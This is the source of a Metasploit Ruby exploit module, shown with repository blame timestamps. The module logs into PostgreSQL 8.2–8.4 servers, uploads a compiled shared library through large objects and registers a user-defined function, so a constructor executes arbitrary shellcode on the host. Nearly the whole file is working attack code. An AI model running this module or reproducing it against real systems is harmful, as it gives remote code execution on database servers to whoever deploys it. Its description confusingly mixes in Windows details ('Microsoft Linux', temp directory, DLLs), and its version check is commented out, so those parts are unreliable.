metasploit-framework/modules/exploits/linux/postgres/postgres_payload.rb

201 lines
5.5 KiB
Ruby
Raw Normal View History

2012-08-14 16:46:35 +00:00
###
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/exploit/postgres'
load 'lib/msf/core/exploit/postgres.rb'
2012-08-14 16:46:35 +00:00
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Postgres
# Creates an instance of this module.
def initialize(info = {})
super(update_info(info,
'Name' => 'PostgreSQL for Linux Payload Execution',
2012-08-14 16:46:35 +00:00
'Description' => %q{
This module creates and enables a custom UDF (user defined function) on the
target host via the UPDATE pg_largeobject method of binary injection. On
default Microsoft Linux installations of PostgreSQL (=< 8.4), the postgres
service account may write to the Windows temp directory, and may source
UDF Shared Libraries's from there as well.
PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on are valid targets for this module.
NOTE: This module will leave a payload executable on the target system when the
attack is finished, as well as the UDF SO and the OID.
},
'Author' =>
[
'midnitesnake', # this Metasploit module
'egypt' # .so technique
2012-08-14 16:46:35 +00:00
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt' ]
2012-08-14 16:46:35 +00:00
],
'Platform' => 'linux',
2012-08-14 16:46:35 +00:00
'Payload' =>
{
'Space' => 65535,
2012-08-14 16:46:35 +00:00
'DisableNops' => true,
},
'Targets' =>
[
[ 'Linux x86', { 'Arch' => ARCH_X86 } ],
[ 'Linux x86_64', { 'Arch' => ARCH_X86_64 } ],
],
2012-08-14 16:46:35 +00:00
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 05 2007'
2012-08-14 16:46:35 +00:00
))
deregister_options('SQL', 'RETURN_ROWSET')
end
# Buncha stuff to make typing easier.
def username; datastore['USERNAME']; end
def password; datastore['PASSWORD']; end
def database; datastore['DATABASE']; end
def rhost; datastore['rhost']; end
def rport; datastore['rport']; end
2012-08-14 16:46:35 +00:00
def verbose; datastore['VERBOSE']; end
def bits; datastore['BITS'];end
def execute_command(cmd, opts)
postgres_sys_exec(cmd)
end
def exploit
version = get_version(username,password,database)
2012-08-14 16:46:35 +00:00
case version
when :nocompat; print_error "Authentication successful, but not a compatable version."
when :noauth; print_error "Authentication failed."
when :noconn; print_error "Connection failed."
end
#return unless version =~ /8\.[234]/
2012-08-14 16:46:35 +00:00
print_status "Authentication successful and vulnerable version #{version} on Linux confirmed."
tbl,fld,so,oid = postgres_upload_binary_data(
payload_so,
"/tmp/#{Rex::Text.rand_text_alpha(8)}.so"
)
2012-08-14 16:46:35 +00:00
unless tbl && fld && so && oid
print_error "Could not upload the UDF SO"
return
end
print_status "Uploaded #{so} as OID #{oid} to table #{tbl}(#{fld})"
begin
postgres_create_sys_exec(so)
rescue
2012-08-14 16:46:35 +00:00
end
postgres_logout if @postgres_conn
end
# A shorter version of do_fingerprint from the postgres_version scanner
# module, specifically looking for versions that valid targets for this
# module.
def get_version(user=nil,pass=nil,database=nil)
2012-08-14 16:46:35 +00:00
begin
#msg = "#{rhost}:#{rport} Postgres -"
2012-08-14 16:46:35 +00:00
password = pass || postgres_password
vprint_status("Trying username:'#{user}' with password:'#{password}' against #{rhost}:#{rport} on database '#{database}'")
result = postgres_fingerprint(
:db => database,
:username => user,
:password => password
)
if result[:auth]
# So, the only versions we have DLL binaries for are PostgreSQL 8.2, 8.3, and 8.4
# This also checks to see if it was compiled with a windows-based compiler --
# the stock Postgresql downloads are Visual C++ for 8.4 and 8.3, and GCC for mingw)
# Also, the method to write files to disk doesn't appear to work on 9.0, so
# tabling that version for now.
#if result[:auth] =~ /PostgreSQL (8\.[234]).*(Visual C\+\+|mingw|cygwin)/i
if result[:auth] =~ /PostgreSQL (8\.[234]).*/i
return $1
else
print_status "Found #{result[:auth]}"
return :nocompat
end
else
return :noauth
end
rescue Rex::ConnectionError
vprint_error "#{rhost}:#{rport} Connection Error: #{$!}"
return :noconn
end
end
def payload_so
shellcode = Rex::Text.to_hex(payload.encoded, "\\x")
#shellcode = "\\xcc"
c = %Q^
int _exit(int);
int printf(const char*, ...);
int perror(const char*);
void *mmap(int, int, int, int, int, int);
void *memcpy(void *, const void *, int);
int mprotect(void *, int, int);
int fork();
#define MAP_PRIVATE 2
#define MAP_ANONYMOUS 32
#define PROT_READ 1
#define PROT_WRITE 2
#define PROT_EXEC 4
#define PAGESIZE 0x1000
char shellcode[] = "#{shellcode}";
void run_payload(void) __attribute__((constructor));
void run_payload(void)
{
int (*fp)();
fp = mmap(0, PAGESIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
memcpy(fp, shellcode, sizeof(shellcode));
if (mprotect(fp, PAGESIZE, PROT_READ|PROT_WRITE|PROT_EXEC)) {
_exit(1);
}
if (!fork()) {
fp();
}
return;
}
^
cpu = case target_arch.first
when ARCH_X86; Metasm::Ia32.new
when ARCH_X86_64; Metasm::X86_64.new
end
payload_so = Metasm::ELF.compile_c(cpu, c, "payload.c")
so_file = payload_so.encode_string(:lib)
File.open("payload.so", "wb") { |fd| fd.write so_file }
so_file
end
2012-08-14 16:46:35 +00:00
end